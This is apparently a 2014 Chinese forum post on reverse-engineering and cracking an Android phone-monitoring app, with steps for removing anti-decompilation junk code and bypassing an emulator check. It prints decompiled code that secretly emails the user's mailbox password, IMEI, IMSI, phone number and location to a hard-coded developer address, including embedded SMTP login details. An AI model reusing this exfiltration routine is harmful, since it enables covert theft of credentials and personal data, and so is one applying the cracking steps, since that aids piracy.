-
-
[原创]某通信监控软件爆破分析
-
发表于: 2014-12-17 02:26
-
注:本APP会有杀软报毒,不过其本身就类似木马,介意的朋友请慎下。
使用用具:APKIDE(改之理)
IDA Pro
Arm汇编转换器
UltraEdit
先运行软件,出来启动界面后居然退出了,我用的2.2版本Android SDK模拟器,是不是版本问题?换了4.x的,现象依然一样,第一反应是APP检测了模拟器环境。
那么就反编译出来看看吧。将软件apk用APKIDE反编译,看起来很顺利,分析AndroidManifest.xml,找到主Activity为com.vipios.activity.MainActivity,找到相应目录下的MainActivity.smali,打开,很长很不直观啊,看看Java代码吧,打开Java源码的菜单居然灰色不可选,看着反编译出来的类名和smali内容很工整啊,没有混淆过,不甘心啊。
是什么问题呢?dex中有什么猫腻呢?IDA Pro是时候该出场了。将apk拖入IDA,选择classes.dex进行分析。既然是来找问题的,分析完直接Ctrl-Q查看问题代码,看到吗,不少哦!
点击第一处CODE,看到的代码不知所云,Source file也没解析出来:
这部分代码所属public java.lang.String android.a.a()对应smali\android\a.smali文件,在APKIDE中打开,看到source "\nSDK\u7248\u672c:",这个明显是为了干扰反编译程序植入的垃圾代码,直接删除a.smali。
余下的问题代码同样处理,删除完垃圾smali后,在APKIDE中编译通过,然后再反编译刚才编译出来的apk,打开Java源码的菜单可选了,打开看看,很漂亮的代码,Bingo!(注:这个apk不能运行,后面的修改都是建立在原包的基础上的)
来到MainActivity看看,onStart中调用的isMoni()这个函数从名字到长相都很可疑,看看代码:
private boolean isMoni()
{
String str = ((TelephonyManager)getSystemService("phone")).getDeviceId();
return (str != null) && (str.trim().length() != 0) && (!str.matches("0+"));
} if (!OtherOperatorService.check3Gwifi(getApplicationContext()))
{
Toast.makeText(getApplicationContext(), "先开启手机网络,以便测试邮箱是否可用", 1).show();
return;
} invoke-static {v3}, Lcom/vipios/service/OtherOperatorService;->check3Gwifi(Landroid/content/Context;)Z
move-result v3
if-nez v3, :cond_3 Thread localThread = new Thread(new Runnable()
{
public void run()
{
String str1 = MainActivity.this.smtpTemp;
String str2 = MainActivity.this.portTemp;
String str3 = MainActivity.this.userEmailTemp;
String str4 = MainActivity.this.userPasswordTemp;
String str5 = MainActivity.this.userEmailTemp;
String[] arrayOfString = new String[1];
arrayOfString[0] = MainActivity.this.userEmailTemp;
MailSenderInfo localMailSenderInfo = new MailSenderInfo(str1, str2, str3, str4, true, str5, arrayOfString, MainActivity.this.subject, MainActivity.this.content);
if (new SimpleMailSender().sendHtmlMail(localMailSenderInfo))
{
MainActivity.testok = 1;
MainActivity.this.userSave();
return;
}
MainActivity.testok = 2;
}
});
localThread.start();
try
{
localThread.join();
if (testok == 1)
{
Toast.makeText(getApplicationContext(), "恭喜你,保存成功", 1).show();
setUserEditedStates(false);
this.subject = (this.userEmailTemp + "-" + this.shoujiImei + "正在测试" + OtherOperatorService.getVersionName(this) + "版(" + getPackageName() + "-" + "" + "-" + "finspy_vip@163.com" + ")");
this.content = ("设定邮箱:" + this.userEmailTemp + "(" + this.userPasswordTemp + ")绑定号码:" + this.userPhoneNumberTemp + ";设置功能:" + this.tonghuajiluTemp + "," + this.duanxinjiluTemp + "," + this.tonghualuyinTemp + "," + this.weizhijiluTemp + "," + this.qqjiluTemp + "," + this.weixinjiluTemp + ";发送设置:" + this.allnetTemp + "," + this.wifiTemp + ";SDK版本:" + Build.VERSION.SDK_INT + ";" + "Model型号:" + Build.MODEL + ";Android版本:" + Build.VERSION.RELEASE + "<br/>当前卡号及编码" + this.NativePhoneNumber + "," + this.IMSI + "(" + OtherOperatorService.getCardName(this.IMSI) + ")" + LocationEmailInfo.getBaiduMaplink());
OtherOperatorService.uploadEmail(OtherOperatorService.getUserSmtp("tyling7775@yeah.net"), OtherOperatorService.getUserPort("tyling7775@yeah.net"), "tyling7775@yeah.net", "tyling132014", "tyling7775@yeah.net", new String[] { "finspy_vip@163.com" }, this.subject, this.content);
testok = 0;
return;
}
}
catch (InterruptedException localInterruptedException)
{
do
{
for (;;)
{
testok = 2;
}
} while (testok != 2);
Toast.makeText(getApplicationContext(), "开启你邮箱SMTP服务(查看帮助),或邮箱或密码输入错误;或更换邮箱重试!", 1).show();
testok = 0;
} [招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
